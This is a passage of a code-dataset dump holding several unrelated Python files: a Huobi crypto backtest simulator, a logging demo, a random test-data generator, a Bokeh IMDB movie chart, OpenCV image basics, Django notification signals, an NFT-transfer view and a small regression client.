{:.2f}%, with {} data\".format(period, 100, len(self.klines_data[period])), flush=True)\r\n break\r\n\r\n for idx in xrange(len(self.klines_data[period])):\r\n if self.klines_data[period][idx]['id'] >= self.now_timeline:\r\n self.last_tick_data[period] = copy.copy(self.klines_data[period][idx - 1])\r\n self.klines_idx[period] = idx - 1\r\n break\r\n\r\n self.inited = True\r\n self.UpdateTick()\r\n\r\n def UpdateTick(self):\r\n if self.now_timeline >= time.time():\r\n self.CalResult()\r\n quant.stop()\r\n ST.IS_CLOSE = True\r\n return\r\n if self.now_timeline 
== self.init_timeline:\r\n            print(\"\\nhuobi test process: %.1f%%\" % (0, ), end='', flush=True)\r\n\r\n        if self.last_tick_time != ST.strategies.tick_count:\r\n            # time step applied on each test tick update\r\n            # self.now_timeline += 60\r\n            COUNT = 3\r\n            self.last_minut_s += 1\r\n            if self.last_minut_s >= COUNT:\r\n                self.last_minut_s = 0\r\n                self.now_timeline += 60 - COUNT + 1\r\n                self.high_first = random.choice([True, False])\r\n\r\n            self.last_tick_time = ST.strategies.tick_count\r\n            f = 100 * (self.now_timeline - self.init_timeline) / (time.time() - self.init_timeline)\r\n            print(\"\\rhuobi test process: %.1f%%\" % (f, ), end='', flush=True)\r\n\r\n            for period in self.klines_idx:\r\n                for idx in xrange(self.klines_idx[period] - 1, len(self.klines_data[period])):\r\n                    if self.klines_data[period][idx]['id'] >= self.now_timeline:\r\n                        if idx - 1 != self.klines_idx[period]:\r\n                            self.klines_data[period][self.klines_idx[period]] = self.last_tick_data[period]\r\n                            self.klines_idx[period] = idx - 1\r\n                            self.last_tick_data[period] = copy.copy(self.klines_data[period][idx - 1])\r\n                            d = self.klines_data[period][idx - 1]\r\n                            d['close'] = d['high'] = d['low'] = d['open']\r\n                        break\r\n\r\n        min_data = self.last_tick_data['1min']\r\n        if self.last_minut_s == 0:\r\n            price = min_data['open']\r\n        elif self.last_minut_s == COUNT - 1:\r\n            price = min_data['close']\r\n        elif self.last_minut_s == COUNT - 2:\r\n            price = min_data['high'] if self.high_first else min_data['low']\r\n        elif self.last_minut_s == COUNT - 3:\r\n            price = min_data['low'] if self.high_first else min_data['high']\r\n        else:\r\n            price = random.uniform(min_data['low'], min_data['high'])\r\n        # price = random.uniform(min_data['low'], min_data['high'])\r\n\r\n        for period in self.klines_idx:\r\n            d = self.klines_data[period][self.klines_idx[period]]\r\n            if price > d['high']:\r\n                d['high'] = price\r\n            if price < d['low']:\r\n                d['low'] = price\r\n            d['close'] = price\r\n\r\n        self.ask1_price = price # best ask price\r\n        self.bid1_price = price - 0.001 # best bid price\r\n\r\n        self.UpdateTotAsset()\r\n        if self.last_minut_s == COUNT - 1:\r\n            dateArray = datetime.datetime.fromtimestamp(self.now_timeline)\r\n            otherStyleTime = dateArray.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n            self.asset_list.append({'asset': self.tot_asset,\r\n                                    'price': price,\r\n                                    'time': otherStyleTime,\r\n                                    'op': self.op_time,})\r\n            self.op_time = []\r\n\r\n    async def GetOrders(self):\r\n        pass\r\n\r\n    async def GetPosition(self):\r\n        return self.position\r\n\r\n    def FetchFreeAsset(self):\r\n        return self.free_asset\r\n\r\n    def FetchTotAsset(self):\r\n        self.UpdateTotAsset()\r\n        return self.tot_asset\r\n\r\n    async def CheckOrderStatus(self, order_id):\r\n        # TODO: check whether the buy order was filled\r\n        pass\r\n\r\n    async def Buy(self, price, quantity):\r\n        price = float(price)\r\n        if self.free_asset < 0:\r\n            return\r\n        can_buy = math.floor(float(self.free_asset) * self.level * price // self.face_value)\r\n        if can_buy == 0:\r\n            print(\"Can't buy 3\")\r\n            return\r\n        quantity = int(quantity)\r\n\r\n        if (quantity > 0 and price < self.ask1_price) or (quantity < 0 and price > self.bid1_price): \r\n            return\r\n\r\n        if abs(quantity) > can_buy:\r\n            return\r\n\r\n        logger.info(\"[OP Buy]\", price, quantity)\r\n        self.op_time.append(('BUY', price))\r\n        asset_diya = abs(quantity) / price / self.level * self.face_value\r\n\r\n        fee = abs(quantity) * 0.0004 * self.face_value / price\r\n        # print('quantity:', quantity, 'fee:', fee)\r\n        self.tot_fee += fee\r\n        self.free_asset -= asset_diya + fee\r\n        if quantity > 0:\r\n            self.position.long_quantity += int(quantity)\r\n            self.position.long_avg_price = 
price\r\n else:\r\n self.position.short_quantity += int(abs(quantity))\r\n self.position.short_avg_price = price\r\n return quantity\r\n\r\n async def Sell(self, price, quantity):\r\n if quantity == 0:\r\n return\r\n if (quantity > 0 and price > self.bid1_price) or (quantity < 0 and price < self.ask1_price): \r\n return\r\n quantity = int(quantity)\r\n\r\n self.UpdateTotAsset()\r\n add_asset = 0\r\n if quantity > 0:\r\n if self.position.long_quantity < quantity:\r\n logger.error(\"Can't be!\")\r\n return\r\n self.position.long_quantity -= quantity\r\n buy_price = self.position.long_avg_price\r\n dire = 1\r\n add_asset = (1/buy_price - 1/price) * quantity * self.face_value\r\n if self.position.long_quantity:\r\n self.position.long_avg_price = 0\r\n else:\r\n if self.position.short_quantity < int(abs(quantity)):\r\n logger.error(\"Can't be!\")\r\n return\r\n self.position.short_quantity += quantity\r\n buy_price = self.position.short_avg_price\r\n dire = -1\r\n add_asset += (1/price - 1/buy_price) * -quantity * self.face_value\r\n if self.position.short_quantity:\r\n self.position.short_avg_price = 0\r\n\r\n logger.info(\"[OP Sell]\", price, quantity)\r\n self.deal_count += 1\r\n self.op_time.append((buy_price, price, dire, add_asset))\r\n fee = abs(quantity) * 0.0004 * self.face_value / price\r\n self.tot_fee += fee\r\n self.free_asset = self.tot_asset - fee\r\n return quantity\r\n\r\n def UpdateTotAsset(self):\r\n asset_recover = 0\r\n add_asset = 0\r\n price = self.ask1_price\r\n if self.position.long_quantity > 0:\r\n quantity = self.position.long_quantity\r\n buy_price = self.position.long_avg_price\r\n add_asset = (1/buy_price - 1/price) * quantity * self.face_value\r\n asset_recover = abs(quantity) / buy_price / self.level * self.face_value\r\n\r\n if self.position.short_quantity > 0:\r\n quantity = self.position.short_quantity\r\n buy_price = self.position.short_avg_price\r\n add_asset += (1/price - 1/buy_price) * quantity * self.face_value\r\n asset_recover += abs(quantity) / buy_price / self.level * self.face_value\r\n\r\n self.tot_asset = self.free_asset + asset_recover + add_asset\r\n\r\n def CalResult(self):\r\n self.UpdateTotAsset()\r\n init_array = datetime.datetime.fromtimestamp(self.init_timeline)\r\n init_time_str = init_array.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n now_array = datetime.datetime.fromtimestamp(self.now_timeline)\r\n now_time_str = now_array.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n f = 100 * (self.now_timeline - self.init_timeline) / (time.time() - self.init_timeline)\r\n\r\n print('\\nStart time: ', init_time_str, self.init_timeline)\r\n if f < 100:\r\n print('End time: ', now_array, 'rate:%.3f%%' % (f, ))\r\n print(\"left:\", self.tot_asset, 'fee:', self.tot_fee, 'deal count:', self.deal_count)\r\n save = pd.DataFrame(self.asset_list)\r\n save.to_csv(\"test.csv\")\r\n self.Draw()\r\n return\r\n\r\n def Draw(self):\r\n return\r\n\r\n async def GetRecentKLine(self, period, time_long):\r\n self.UpdateTick()\r\n last_idx = self.klines_idx[period]\r\n ret = self.klines_data[period][last_idx - time_long + 1:last_idx + 1]\r\n return ret\r\n\r\n def Search(self, li, key, find_big=True):\r\n le = 0\r\n ri = len(li) - 1\r\n while le < ri:\r\n if not find_big and (le + ri) & 1:\r\n mid = (le + ri) // 2\r\n else:\r\n mid = (le + ri) // 2\r\n\r\n if mid == key:\r\n return mid\r\n\r\n if key < li[mid]['id']:\r\n ri = mid - 1\r\n else:\r\n le = mid + 1\r\n return le\r\n\r\n async def GetKLines(self, period, from_time, to_time=None):\r\n self.UpdateTick()\r\n if self.now_timeline 
>= time.time():\r\n            return None\r\n        if to_time is None:\r\n            to_time = self.now_timeline\r\n\r\n        l1 = self.Search(self.klines_data[period], from_time)\r\n        l2 = self.Search(self.klines_data[period], to_time, False)\r\n        # NOTE: the original ended here without a return; returning the located slice is an assumed completion\r\n        return self.klines_data[period][l1:l2 + 1]\r\n\r\n    def time(self):\r\n        return self.now_timeline\r\n", "repo_name": "yylogo/huobi_trade", "sub_path": "market/huobi_test.py", "file_name": "huobi_test.py", "file_ext": "py", "file_size_in_byte": 12996, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "market.huobi.HuobiMarket", "line_number": 28, "usage_type": "call"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "alpha.tasks.SingleTask.run", "line_number": 42, "usage_type": "call"}, {"api_name": "alpha.tasks.SingleTask", "line_number": 42, "usage_type": "name"}, {"api_name": "alpha.position.Position", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 72, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 75, "usage_type": "call"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "time.time", "line_number": 84, "usage_type": "call"}, {"api_name": "asyncio.sleep", "line_number": 86, "usage_type": "call"}, {"api_name": "six.moves.xrange", "line_number": 94, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 96, "usage_type": "call"}, {"api_name": "time.time", "line_number": 104, "usage_type": "call"}, {"api_name": "alpha.quant.quant.stop", "line_number": 106, "usage_type": "call"}, {"api_name": "alpha.quant.quant", "line_number": 106, "usage_type": "name"}, {"api_name": "strategies.IS_CLOSE", "line_number": 107, "usage_type": "attribute"}, {"api_name": "strategies.strategies", "line_number": 112, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 120, "usage_type": "call"}, {"api_name": "strategies.strategies", "line_number": 122, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 123, "usage_type": "call"}, {"api_name": "six.moves.xrange", "line_number": 127, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 132, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 147, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 163, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 163, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 192, "usage_type": "call"}, {"api_name": "alpha.utils.logger.info", "line_number": 204, "usage_type": "call"}, {"api_name": "alpha.utils.logger", "line_number": 204, "usage_type": "name"}, {"api_name": "alpha.utils.logger.error", "line_number": 231, "usage_type": "call"}, {"api_name": "alpha.utils.logger", "line_number": 231, "usage_type": "name"}, {"api_name": "alpha.utils.logger.error", "line_number": 241, "usage_type": "call"}, {"api_name": "alpha.utils.logger", "line_number": 241, "usage_type": "name"}, {"api_name": "alpha.utils.logger.info", "line_number": 250, "usage_type": "call"}, {"api_name": "alpha.utils.logger", "line_number": 250, "usage_type": "name"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 278, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 278, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 280, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 280, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 282, 
"usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 288, "usage_type": "call"}, {"api_name": "time.time", "line_number": 322, "usage_type": "call"}]}
+{"seq_id": "18761424420", "text": "import logging\n#-*- coding:utf-8 –*-\nimport logging\nfrom logging.handlers import RotatingFileHandler\n#定义一个RotatingFileHandler,最多备份5个日志文件,每个日志文件最大10M\nRthandler = RotatingFileHandler('myapp.log', maxBytes=0.1*1024*1024,backupCount=5)\nRthandler.setLevel(logging.INFO)\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nRthandler.setFormatter(formatter)\nlogging.getLogger('').addHandler(Rthandler)\n\nlogging.debug('debug 日志信息')\nlogging.info('info 日志信息')\nlogging.warning('warning 日志信息')\nlogging.error('error 日志信息') \nlogging.critical('critical 日志信息') \n", "repo_name": "iweimingliang/script", "sub_path": "python/logging/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 657, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.handlers.RotatingFileHandler", "line_number": 6, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 7, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 13, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "4028660432", "text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"Module for providing randoms data for web-app's entities.\"\"\"\n__author__ = 'AleksNeStu'\n__copyright__ = \"The GNU General Public License v3.0\"\n\nimport functools\nimport random\nimport string\n\nfrom constants import data, repeat\n\n\nclass RandomData(object):\n \"\"\"Class that provide random data for generate web-app objects.\"\"\"\n\n @staticmethod\n def common_part(prefix, maxlen=repeat.RANDOM_DATA):\n \"\"\"Random generator of the common parts.\"\"\"\n symbols = string.ascii_letters + string.digits + string.punctuation\n return prefix + \"\".join(\n [random.choice(symbols) for _ in range(random.randint(1, maxlen))])\n\n @staticmethod\n def email_part(domain=data.CONTACT_EMAIL_DOMAIN,\n maxlen=repeat.RANDOM_EMAIL):\n \"\"\"Random generator of the email parts.\n Example:\n dosFS@gmail.com.\n \"\"\"\n symbols = string.ascii_letters + string.digits\n return \"\".join([random.choice(symbols) for _ in\n range(random.randint(1, maxlen))]) + domain\n\n @staticmethod\n def phone(code=data.PHONE_CODE):\n \"\"\"Random generator of the phone number (default for USA: code=1)\n Example:\n +1-844-751-8951\n \"\"\"\n d = functools.partial(random.randint, 0, 9)\n phone = lambda: \"+{}-{}{}{}-{}{}{}-{}{}{}{}\".format(\n code, d(), d(), d(), d(), d(), d(), d(), d(), d(), d())\n return phone()", "repo_name": "AleksNeStu/Testing_Automation_Framework__web-app", "sub_path": "framework/generator/random_data.py", "file_name": "random_data.py", "file_ext": "py", "file_size_in_byte": 1482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "constants.repeat.RANDOM_DATA", "line_number": 18, "usage_type": "attribute"}, {"api_name": "constants.repeat", "line_number": 18, "usage_type": "name"}, {"api_name": "string.ascii_letters", "line_number": 20, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 20, "usage_type": "attribute"}, {"api_name": "string.punctuation", "line_number": 20, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 22, "usage_type": "call"}, {"api_name": "constants.data.CONTACT_EMAIL_DOMAIN", "line_number": 25, "usage_type": "attribute"}, {"api_name": "constants.data", "line_number": 25, "usage_type": "name"}, {"api_name": "constants.repeat.RANDOM_EMAIL", "line_number": 26, "usage_type": "attribute"}, {"api_name": "constants.repeat", "line_number": 26, "usage_type": "name"}, {"api_name": "string.ascii_letters", "line_number": 31, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 31, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 32, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "constants.data.PHONE_CODE", "line_number": 36, "usage_type": "attribute"}, {"api_name": "constants.data", "line_number": 36, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 41, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 41, "usage_type": "attribute"}]}
+{"seq_id": "797693188", "text": "\n# coding: utf-8\n\n# # Data visualisation Project - Visualisation 1\n\n# Now, that we have cleaned data we can use it for creating visualisations and finding interesting things from it.\n\n# Importing necessary libraries and the data set\n\n# In[4]:\n\n\nimport pandas as pd\nimport numpy as np\n\n\n# In[5]:\n\n\nfrom bokeh.plotting import figure , show\nfrom bokeh.layouts import layout, widgetbox, row\nfrom bokeh.models import ColumnDataSource, Div, HoverTool, Legend\nfrom bokeh.models.widgets import Slider, Select\nfrom bokeh.io import curdoc, output_notebook\n\n\n# In[6]:\n\n\nfrom bokeh.transform import factor_cmap\nfrom bokeh.palettes import Colorblind\n\n\n# In[5]:\n\n\n#output_notebook()\n\n\n# In[6]:\n\n\ndataset_names = pd.read_csv('I:/DCU/SEM1/Lectures/Data Management & Visualisation - CA682 Suzanne Little/project/imdb_project/cleaned data/names.csv',index_col= 'nconst')\n\n\n# In[7]:\n\n\ndataset_titles_ratings = pd.read_csv('I:/DCU/SEM1/Lectures/Data Management & Visualisation - CA682 Suzanne Little/project/imdb_project/cleaned data/titles_basic_rating.csv',index_col= 'tconst')\n\n\n# In[8]:\n\n\ndataset_titles_prin = pd.read_csv('I:/DCU/SEM1/Lectures/Data Management & Visualisation - CA682 Suzanne Little/project/imdb_project/cleaned data/titles_principle.csv',index_col= 'tconst')\n\n\n# In[295]:\n\n\n#dataset_titles_prin.head()\n\n\n# In[296]:\n\n\n#dataset_titles_ratings.head()\n\n\n# In[297]:\n\n\n#dataset_names.head()\n\n\n# In[298]:\n\n\n#dataset_titles_ratings.describe(include = 'all')\n\n\n# We want to concentrate on Comedy, Romance, Drama, Horror and Action genres for our visualisations\n\n# In[1]:\n\n\ngenres = ['Comedy','Romance', 'Drama','Horror','Action']\n\n\n# In[10]:\n\n\n#genres\n\n\n# Creating a source data for our visualisation.\n\n# In[7]:\n\n\nsource = ColumnDataSource(data=dict(x=[], y=[], genre=[], title=[], year=[]))\n\n\n# Defining the parameters for the visualisation.\n\n# In[8]:\n\n\np = figure(plot_height=650, plot_width=700, title=\"\" , toolbar_location=None, x_range=(10,100000),y_range=(0,11),x_axis_type=\"log\")\n\n\n# In[9]:\n\n\nc = p.circle(x=\"x\", y=\"y\", source=source, size=7, color=factor_cmap('genre', palette=Colorblind[5], factors=genres), legend='genre')\n\n\n# In[51]:\n\n\np.add_tools(HoverTool( tooltips=[\n (\"Title\", \"@title\"),\n (\"Genre\", \"@genre\"),\n ]\n ))\np.legend.location = \"top_right\"\np.legend.orientation = \"horizontal\"\np.xaxis.axis_label_text_font_size =\"16pt\"\np.yaxis.axis_label_text_font_size= \"16pt\"\np.title.text_font_size = '20pt'\np.title.align = \"center\"\np.title.offset =10\n\n\n# In[52]:\n\n\np.xaxis.axis_label = 'Number of Votes'\np.yaxis.axis_label = 'Average Rating'\n\n\n# Defining the call back function, to be called on change of slider and drop down value\n\n# In[53]:\n\n\ndef callback(attr, old, new):\n print('inside callback')\n update(num=min_year.value,genre_sel=genre_select.value)\n\n\n# In[54]:\n\n\ngenres_sel_list = genres.append('All')\nmin_year = Slider(title=\"Year\", start=1950, end=2018, value=2015, step=1)\nmin_year.on_change('value',callback)\ngenre_select=Select(title=\"Genre\", value=\"All\", options=genres)\ngenre_select.on_change('value',callback)\n\n\n# In[55]:\n\n\ndef select_movies(num,genre_sel):\n selected = dataset_titles_ratings[\n (dataset_titles_ratings.startYear == num)\n & (dataset_titles_ratings.titleType == 'movie') & \n (dataset_titles_ratings.genre1 != '\\\\N')\n &((dataset_titles_ratings.genre1 == 'Comedy') | 
(dataset_titles_ratings.genre1 == 'Romance') |\n (dataset_titles_ratings.genre1 == 'Action') | (dataset_titles_ratings.genre1 == 'Horror') |\n (dataset_titles_ratings.genre1 == 'Drama'))]\n if (genre_sel != \"All\"):\n selected = selected[selected.genre1.str.contains(genre_sel)==True]\n return selected\n\n\n# In[56]:\n\n\ndef update(num,genre_sel):\n df = select_movies(num,genre_sel)\n p.title.text = str(len(df)) + \" movies selected for year \" + str(min_year.value) \n source.data = dict(\n x=df['numVotes'],\n y=df['averageRating'],\n genre=df[\"genre1\"],\n title=df.originalTitle,\n year=df[\"startYear\"])\n return (source.data)\n \n\n\n# In[57]:\n\n\nsizing_mode = 'fixed'\ninputs = widgetbox(min_year,genre_select, sizing_mode=sizing_mode)\nlayout = row(p,inputs)\n\n\n# In[58]:\n\n\nnew_value = update(min_year.value,genre_select.value)\n\n\n# In[59]:\n\n\ncurdoc().add_root(layout)\ncurdoc().title = \"Movies\"\n\n\n# In[60]:\n\n\n#show(layout)\n\n", "repo_name": "guptaa3/IMDB_data_visulisation", "sub_path": "Python files/Data_visualisation_project_visual_1.py", "file_name": "Data_visualisation_project_visual_1.py", "file_ext": "py", "file_size_in_byte": 4326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 55, "usage_type": "call"}, {"api_name": "bokeh.models.ColumnDataSource", "line_number": 101, "usage_type": "call"}, {"api_name": "bokeh.plotting.figure", "line_number": 109, "usage_type": "call"}, {"api_name": "bokeh.transform.factor_cmap", "line_number": 115, "usage_type": "call"}, {"api_name": "bokeh.palettes.Colorblind", "line_number": 115, "usage_type": "name"}, {"api_name": "bokeh.models.HoverTool", "line_number": 121, "usage_type": "call"}, {"api_name": "bokeh.models.widgets.Slider", "line_number": 156, "usage_type": "call"}, {"api_name": "bokeh.models.widgets.Select", "line_number": 158, "usage_type": "call"}, {"api_name": "bokeh.layouts.widgetbox", "line_number": 198, "usage_type": "call"}, {"api_name": "bokeh.layouts.layout", "line_number": 199, "usage_type": "name"}, {"api_name": "bokeh.layouts.row", "line_number": 199, "usage_type": "call"}, {"api_name": "bokeh.layouts.layout", "line_number": 211, "usage_type": "argument"}, {"api_name": "bokeh.io.curdoc", "line_number": 211, "usage_type": "call"}, {"api_name": "bokeh.io.curdoc", "line_number": 212, "usage_type": "call"}]}
+{"seq_id": "74704017688", "text": "import numpy as np\nimport cv2\n\nprint(\"OpenCV version:\", cv2.__version__)\n\nimg = cv2.imread('/home/ahu/Workspace/py-video-processing-rsc/opencv-master/samples/data/lena.jpg', -1)\nimg2 = cv2.imread('/home/ahu/Workspace/py-video-processing-rsc/opencv-master/samples/data/logo-225-225.png', -1)\n\n# Tuple of number of rows, columns and channels\nprint(img.shape)\n\n# Total number of pixels is accessible\nprint(img.size)\n\n# Image datatype\nprint(img.dtype)\n\n# Split an image in 3 channels\nb, g, r = cv2.split(img)\n\n# Merge 3 channels in an image\nimg = cv2.merge((b, g, r))\n\n# Move a part of an image [y1:y2, x1:x2] (ROI : Region Of Interest)\neye = img[250:290, 250:290]\nimg[210:250, 290:330] = eye\ncv2.imshow('image', img)\n\n# Add 2 images\nimg = cv2.resize(img, (225, 225))\nimg2 = cv2.resize(img2, (225, 225))\ndst1 = cv2.add(img, img2)\ncv2.imshow('imageadd1', dst1)\n\n# Add 2 images with weight %1stimg %2ndimg\n# args : img1, alpha, img2, beta, gamma\n# -> img1*alpha + img2*beta + gamma\ndst2 = cv2.addWeighted(img, 0.75, img2, 0.25, 0)\ncv2.imshow('imageadd2', dst2)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n", "repo_name": "Karma-Team/py-video-processing", "sub_path": "examples/10_basic_operations_on_images.py", "file_name": "10_basic_operations_on_images.py", "file_ext": "py", "file_size_in_byte": 1095, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.__version__", "line_number": 4, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.split", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.merge", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.add", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "11259385810", "text": "#! -*- coding:utf-8 -*-\nfrom django.dispatch import Signal\nfrom django.db.models.signals import post_save\nfrom django.core.signals import request_finished\nfrom groups.models import Group, Topic, Reply, Applicant\nfrom sys_notification.models import Notification\n\n# 群组操作的signal\ngroup_notify = Signal(providing_args=[\"instance\", \"args\", \"kwargs\"])\n\n# 话题操作的signal\ntopic_notify = Signal(providing_args=[\"instance\", \"args\", \"kwargs\"])\n\n# 好友操作的signal\nfriend_notify = Signal(providing_args=[\"instance\", \"args\", \"kwargs\"])\n\n# 将通知置为已点击\nset_notity_clicked = Signal(providing_args=[\"request\", \"no_type\", \"args\", \"kwargs\"])\n\n\ndef group_action(sender, instance, *args, **kwargs):\n obj = instance\n if obj.status != 'processing':\n notify = Notification(no_type='group', group_action=obj.status, to_user=obj.applicant, group=obj.group,\n applicant=obj)\n notify.save()\n\ngroup_notify.connect(group_action, dispatch_uid='create_group_notify')\n\n\ndef topic_action(sender, instance, *args, **kwargs):\n obj = instance\n if obj.reply: # 是否是对回复的回复\n notify = Notification(no_type='topic', topic_action='re_reply', to_user=obj.reply.creator, reply=obj.reply,\n topic=obj.topic, )\n notify.save()\n else:\n notify = Notification(no_type='topic', topic_action='re_topic', to_user=obj.topic.creator, topic=obj.topic)\n notify.save()\n\ntopic_notify.connect(topic_action, dispatch_uid='create_topic_notify')\n\n\ndef friend_action(sender, instance, *args, **kwargs):\n obj = instance\n # 关注操作\n notify = Notification(no_type='friend', friend_action='follow', to_user=obj.to_user, follower=obj.from_user)\n notify.save()\nfriend_notify.connect(friend_action, dispatch_uid='follow_notify')\n\n\ndef set_notification_clicked(sender, request, no_type, **kwargs):\n \"\"\"\n 点击相应页面后将通知置为已经点击clicked\n @fanlintao\n \"\"\"\n notify_qs = Notification.objects.filter(to_user=request.user, no_type=no_type, click='unclick')\n notify_qs.update(click='clicked')\n\nset_notity_clicked.connect(set_notification_clicked, dispatch_uid='set_notification_clicked')\n\n\n\n", "repo_name": "mutoulbj/BOHOO", "sub_path": "sys_notification/signals.py", "file_name": "signals.py", "file_ext": "py", "file_size_in_byte": 2235, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.dispatch.Signal", "line_number": 9, "usage_type": "call"}, {"api_name": "django.dispatch.Signal", "line_number": 12, "usage_type": "call"}, {"api_name": "django.dispatch.Signal", "line_number": 15, "usage_type": "call"}, {"api_name": "django.dispatch.Signal", "line_number": 18, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification", "line_number": 24, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification", "line_number": 34, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification", "line_number": 38, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification", "line_number": 47, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification.objects.filter", "line_number": 57, "usage_type": "call"}, {"api_name": "sys_notification.models.Notification.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sys_notification.models.Notification", "line_number": 57, "usage_type": "name"}]}
+{"seq_id": "14761058338", "text": "from .services import get_transfers_by_id\nfrom django.http import HttpResponse\nimport json\n\n\n# Create your views here.\n\n\ndef get_transfers(requests):\n chain = requests.GET.get(\"chain\")\n address = requests.GET.get(\"address\")\n token_id = requests.GET.get(\"token_id\")\n\n nft_transfers = get_transfers_by_id(chain=chain, address=address, token_id=token_id)\n json_transfers = json.dumps(nft_transfers)\n return HttpResponse(json_transfers)\n", "repo_name": "MoralisWeb3/youtube-tutorials", "sub_path": "get-nft-transfers-by-id/backend/nft/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 451, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 606, "dataset": "github-code", "pt": "31", "api": [{"api_name": "services.get_transfers_by_id", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "22042301831", "text": "import requests\nimport numpy as np\nfrom sklearn import linear_model\n\n## get data and trans to np\nurl = 'http://127.0.0.1:5000'\njson_data = requests.get(url).json()\ndata = np.array( [[ float(x), json_data[x]] for x in json_data ])\nprint(data)\n\n## prepare data\nfor i in range(1, len(data)):\n data[i, 0] = np.sum(data[i, 0] + data[i - 1, 0])\nprint(data)\n\n## fit data\nclf = linear_model.LinearRegression()\nclf.fit(data[:, 0].reshape(-1, 1), data[:, 1])\n\n## get coef\nprint(clf.coef_)\n", "repo_name": "kylechenoO/dblr", "sub_path": "client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 482, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 17, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 17, "usage_type": "name"}]}
